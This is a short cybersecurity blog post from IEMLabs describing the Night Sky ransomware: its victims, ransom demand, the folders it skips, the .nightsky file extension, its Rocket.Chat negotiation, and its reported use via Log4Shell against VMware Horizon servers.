New Night Sky Ransomware Enters Corporate Ransom Attack Scene

New-Night-Sky-Ransomware-Enters-Corporate-Ransom-Attack-Scene.

Night Sky, a new ransomware that targets business networks and steals data from VMware Horizon servers for extortion, has been discovered. Night Sky is the name of the ransomware, which became live on December 27, 2021.

Night Sky: Everything You Need to Know

MalwareHunterTeam first detected the ransomware after publishing the data of two victims.

A Tor data leak site belonging to the organisation shows one victim from Bangladesh and another from Japan.

The attackers sought $800,000 in ransom for the decryptor from one of the victims, threatening to leak the stolen data if the ransom was not paid.

Night Sky began to operate in the last week of December 2021. We don’t know much about it yet, but a human operator is likely to be engaged in the reconnaissance, access, and eventual extraction of files from all network endpoints before Night Sky is launched. It’s also assumed that the Night Sky attackers use tried-and-true ways to access business networks, such as social engineering and the use of stolen credentials.

 

This ransomware encrypts the bulk of files on infected machines once it is begun. It ignores files with the.dll and.exe extensions. It also ignores files and folders in the following directories:

  • $Recycle.Bin
  • All Users
  • AppData
  • autorun.inf
  • Boot
  • boot.ini
  • bootfont.bin
  • bootmgfw.efi
  • bootmgr
  • bootmgr.efi
  • bootsect.bak
  • desktop.ini
  • Google
  • iconcache.db
  • Internet Explorer
  • Mozilla
  • Mozilla Firefox
  • ntldr
  • ntuser.dat
  • ntuser.dat.log
  • ntuser.ini
  • Opera
  • Opera Software
  • Program Files
  • Program Files (x86)
  • ProgramData
  • thumbs.db
  • Tor Browser
  • Windows
  • Windows.old

The .nightsky extension, is used in all the above encrypted files.

Operational aspects

The ransomware encrypts all files except those with the.dll or.exe file extensions while it is active.

The.nightsky extension is appended to encrypted file names by the ransomware. A ransom letter (NightSkyReadMe[.]hta) is dumped in each folder, with additional information on ransom payment.

Email accounts and a Rocket-powered website are used by the malware.

Chat. The ransom message contains the credentials for logging into the Rocket.Chat URL.

A connection to China

The Night Sky ransomware has been used by a China-based threat group known as DEV-0401. They leveraged the Log4Shell vulnerability in their campaign to get access to VMware Horizon systems.

Final thoughts

Ransomware attacks are without a doubt one of the most common and deadly dangers to businesses throughout the world. Several new ransomware families and variants, such as Night Sky, are discovered almost every month. This suggests that thieves are still making money from ransomware.

By IEMA IEMLabs

IEMLabs is an ISO 27001:2013 and ISO 9001:2015 certified company, we are also a proud member of EC Council, NASSCOM, Data Security Council of India (DSCI), Indian Chamber of Commerce (ICC), U.S. Chamber of Commerce, and Confederation of Indian Industry (CII). The company was established in 2016 with a vision in mind to provide Cyber Security to the digital world and make them Hack Proof. The question is why are we suddenly talking about Cyber Security and all this stuff? With the development of technology, more and more companies are shifting their business to Digital World which is resulting in the increase in Cyber Crimes.

Leave a comment

Your email address will not be published.